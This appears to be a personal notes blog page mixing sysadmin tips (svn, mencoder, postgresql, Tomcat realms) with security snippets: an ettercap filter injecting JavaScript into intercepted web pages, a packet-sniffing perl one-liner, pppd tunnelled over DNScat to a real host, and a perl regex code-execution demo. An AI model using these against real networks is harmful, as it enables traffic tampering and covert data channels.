This should inject a javascript getting your local IP address:

replace(“^</BODY>”,”<script>s1 = \”error\”;s2 = \”error\”;try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\”0.0.0.0\”,0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\”Client’s IP: \”+ s1 + \”(\”+s2+\”)\”); </script></BODY>”);

Yon need to compile this filter with etterfiler and run it with “ettercap -F <filter.ef>

Haven’t tried it but it should work.

Extracting tripples (host, referrer, GET) from HTTP connection packets (prints stuff on “.”).

perl -ne ‘$get = $1 if /^GET ([^\s]) /; $host = $1 if /^Host: ([^\s])/; $ref=$1 if /^Referer: ([^\s]*)/; if (/^.$/) { print “ID, $host, $get, $ref\n”;}’

svn add svn status | perl -ne '/\?\s*(.*)/ && print "$1 "'

1. svnadmin dump <repository> > <dumpfile>
2. move the repository somewhere else.
3. sdnadmin create –fs-type=fsfs <repository>
4. svnadmin load <repository> < <dumpfile>

mencoder motorola_and_p900.avi -o m1.avi -oac copy -vop rotate=1 -ovc lavc

Tried -ovc =xvid, but it segfaults

Rene discovered nice options in postgresql.conf

- Planner Method Enabling -

enable_hashagg = true

enable_hashjoin = true

enable_indexscan = true

enable_mergejoin = true

enable_nestloop = true

enable_seqscan = true

enable_seqscan = false

enable_sort = true

enable_tidscan = true

(more…)

1. MemoryRealm works fine.
2. UserDatabase doesn’t work. The code is ok, but apparently while parsing server.xml file and creating UserDatabase (declared there) the server creates some kind of property file (MBeans), which of course cannot be created for the property which contains sign ‘=’. Therefore it fails.
3. Other realms could possibly work, but they don’t implement authenticate(cert[]) function, which is called to verify the certificates. It’s a bit of a shame and I really don’t see why it could not work. (more…)

Just a few interesting pointers to tools from a book I read:

• WHArsenal – www.whitesec.com (doesn’t seem to be available anymore)
• HTTPush – on the fly modification of requests (in Perl)
• WEBScarab – http://www.owasp.org/software/webscarab.html
• Spikeproxy – http://packages.debian.org/unstable/net/spikeproxy.html
• PenProxy – http://shh.thathost.com/pub-java/html/PenProxy.html

pppd noauth debug nodetach passive 10.0.0.1:10.0.0.2 pty “./DNScatServer -o tadekp.afraid.org -p 50000″

pppd noauth debug nodetach pty “./DNScatClient -o tadekp.afraid.org”

!/usr/bin/perl -w

use re ‘eval’; #this evil command enables it!

$a = “bla”; $user_input = “(?{print “we’re executing this code \n”;})”; $a =~ /$user_input/;

!/usr/bin/perl -w

@files=ls $ARGV[0]; print “file list: @files\n”;